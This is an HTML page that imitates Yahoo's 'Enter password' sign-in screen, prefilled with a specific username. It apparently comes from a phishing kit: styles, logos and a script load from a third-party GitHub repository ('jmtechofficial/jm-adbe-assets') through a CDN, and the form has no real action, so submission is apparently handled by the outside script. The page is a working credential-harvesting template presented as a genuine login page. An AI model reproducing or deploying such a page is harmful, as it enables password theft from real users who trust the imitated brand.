<html id="Stencil" class="js grid light-theme "><head>
    <meta charset="utf-8">
    <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">
    <meta name="format-detection" content="telephone=no">
    <meta name="referrer" content="origin-when-cross-origin">
    <title>Yahoo</title>
    <link rel="icon" type="image/x-icon" href="../src/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
    <link rel="shortcut icon" type="image/x-icon" href="../src/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
    <meta name="google-site-verification" content="yOTFyUBPTnXtuk2cPpqfv7ZvZ960JgqsV8FomN3n7Y0">
    <link rel="apple-touch-icon" href="../src/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
    <link rel="apple-touch-icon-precomposed" href="../src/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
    <style nonce="">
        #mbr-css-check {
            display: inline;
        }
    </style>
    <link href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/wm/mbr/e4793047891fc8d64cda6a67d8098a18e013cffe/yahoo-main.css" rel="stylesheet" type="text/css">
    <style>
        .mbr-desktop-hd{
            height: 84px;
            display: flex;
            align-items: center;
        }
    </style>
    <script src="../../../CONFIG.js"></script>
</head>
<body class="bucket-mbr-yidsreg5 bucket-mbr-qr-comet-sdk">

<div id="login-body" class="loginish  puree-v2  grid    ">
    <div class="mbr-desktop-hd">
    <span class="column">
         <a href="https://www.yahoo.com/">
            <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo " width="" height="36">
            <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo " width="" height="36">
        </a>
    </span>
        <span class="column help txt-align-right">
        <a href="https://help.yahoo.com/kb/index?locale=en_US&amp;page=product&amp;y=PROD_ACCT">Help</a>
    </span>
    </div>
    <div class="login-box-container">
        <div class="login-box right">
            <div class="mbr-login-hd txt-align-center">
                <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo yahoo-en-US" width="" height="27">
                <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo yahoo-en-US" width="" height="27">
            </div>
            <div class="challenge password-challenge">
                <div class="challenge-header">
                    <div class="yid">bennythejokeman</div>
                </div><div id="password-challenge" class="primary">
                <strong class="challenge-heading">Enter&nbsp;password</strong>
                <span class="txt-align-center challenge-desc">to finish sign&nbsp;in</span>
                <form action="" method="post" id="challenge-form" class="challenge-form">
                    <input type="hidden" name="browser-fp-data" id="browser-fp-data" value="{&quot;language&quot;:&quot;en-US&quot;,&quot;colorDepth&quot;:30,&quot;deviceMemory&quot;:8,&quot;pixelRatio&quot;:2,&quot;hardwareConcurrency&quot;:8,&quot;timezoneOffset&quot;:-60,&quot;timezone&quot;:&quot;Africa/Lagos&quot;,&quot;sessionStorage&quot;:1,&quot;localStorage&quot;:1,&quot;indexedDb&quot;:1,&quot;openDatabase&quot;:1,&quot;cpuClass&quot;:&quot;unknown&quot;,&quot;platform&quot;:&quot;MacIntel&quot;,&quot;doNotTrack&quot;:&quot;1&quot;,&quot;plugins&quot;:{&quot;count&quot;:5,&quot;hash&quot;:&quot;2c14024bf8584c3f7f63f24ea490e812&quot;},&quot;canvas&quot;:&quot;canvas winding:yes~canvas&quot;,&quot;webgl&quot;:1,&quot;webglVendorAndRenderer&quot;:&quot;Apple~Apple M1&quot;,&quot;adBlock&quot;:0,&quot;hasLiedLanguages&quot;:0,&quot;hasLiedResolution&quot;:0,&quot;hasLiedOs&quot;:0,&quot;hasLiedBrowser&quot;:0,&quot;touchSupport&quot;:{&quot;points&quot;:0,&quot;event&quot;:0,&quot;start&quot;:0},&quot;fonts&quot;:{&quot;count&quot;:27,&quot;hash&quot;:&quot;d52a1516cfb5f1c2d8a427c14bc3645f&quot;},&quot;audio&quot;:&quot;124.04344968475198&quot;,&quot;resolution&quot;:{&quot;w&quot;:&quot;1440&quot;,&quot;h&quot;:&quot;900&quot;},&quot;availableResolution&quot;:{&quot;w&quot;:&quot;819&quot;,&quot;h&quot;:&quot;1440&quot;},&quot;ts&quot;:{&quot;serve&quot;:1638209062796,&quot;render&quot;:1638209063024}}">
                    <input type="hidden" name="crumb" value="X34LI4HFA4D">
                    <input type="hidden" name="username" id="username">
                    <input type="hidden" name="sessionIndex" value="Qw--">
                    <input type="hidden" name="displayName" value="bennythejokeman">
                    <div class="hidden-username">
                        <input type="text" tabindex="-1" aria-hidden="true" role="presentation" autocorrect="off" spellcheck="false" name="username" value="bennythejokeman">
                    </div>
                    <input type="hidden" name="domain" value="">
                    <input type="hidden" name="isShowButtonClicked" id="show-button-clicked" value="">
                    <input type="hidden" name="showButtonStatus" id="show-button-status" value="">
                    <input type="hidden" name="prefersReducedMotion" id="prefers-reduce-motion" value="">
                    <div id="password-container" class="input-group password-container blurred">
                        <input type="password" id="login-passwd" class="password" name="password" placeholder=" " autofocus="" autocomplete="current-password" data-rapid-tracking="true" data-ylk="elm:input;elmt:focus;slk:passwd;mKey:password-challenge-focus-passwd">
                        <label for="login-passwd" id="password-label" class="password-label">Password</label>
                        <div class="caps-indicator hide" id="caps-indicator" title="Capslock is&nbsp;on"></div>
                        <button type="button" class="show-hide-toggle-button hide-pw" id="password-toggle-button" tabindex="-1" title="Show&nbsp;password" data-rapid-tracking="true" data-ylk="elm:btn;elmt:toggle;slk:toggle-show-passwd;mKey:password-challenge-toggle-show-hide">
                        </button>
                    </div>
                    <p class="error-msg" style="display: none" role="alert" data-error="messages.ERROR_INVALID_PASSWORD">
                        Invalid password. Please try&nbsp;again
                    </p>

                    <div class="button-container">
                        <button type="submit" id="login-signin" class="pure-button puree-button-primary puree-spinner-button challenge-button" name="verifyPassword" value="Next" data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:password-challenge-next">
                            Next
                        </button>
                    </div>
                    <div class="forgot-cont challenge-button-link">
                        <input type="submit" class="pure-button puree-button-link challenge-button-link" data-ylk="elm:btn;elmt:skip;slk:skip;mKey:password-challenge-skip-recovery" data-rapid-tracking="true" id="mbr-forgot-link" name="skip" value="Forgot&nbsp;password?">
                    </div>
                </form>
            </div>
            </div>
        </div>
        <div id="login-box-ad-fallback" class="login-box-ad-fallback" style="display: block;">
            <h1>Yahoo makes it easy to enjoy what matters most in your&nbsp;world.</h1>
            <p>Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies and more. You get more out of the web, you get more out of&nbsp;life.</p>
        </div>
    </div>
    <div class="login-bg-outer">
        <div class="login-bg-inner">
            <div id="login-ad-rich"></div>
        </div>
    </div>

</div>



<noscript>
    <img src="/account/js-reporting/?crumb=X34LI4HFA4D&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword" height="0" width="0" style="visibility: hidden;">
</noscript>

<div id="mbr-css-check"></div>
<div id="page-mask" class="page-mask hide"></div>
<div id="ad"></div>
<div class="mbr-legacy-device-bar" id="mbr-legacy-device-bar">
    <label class="cross" for="mbr-legacy-device-bar-cross" aria-label="Close this&nbsp;warning">x</label>
    <input type="checkbox" id="mbr-legacy-device-bar-cross">
    <p class="mbr-legacy-device">
        Yahoo works best with the latest versions of the browsers. You're using an outdated or unsupported browser and some Yahoo features may not work properly. Please update your browser version now. <a href="">More&nbsp;Info</a>
    </p>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js" integrity="sha256-xNzN2a4ltkB44Mc/Jz3pT4iU1cmeR0FkXs4pru/JxaQ=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/jsc.js"></script>
</body></html>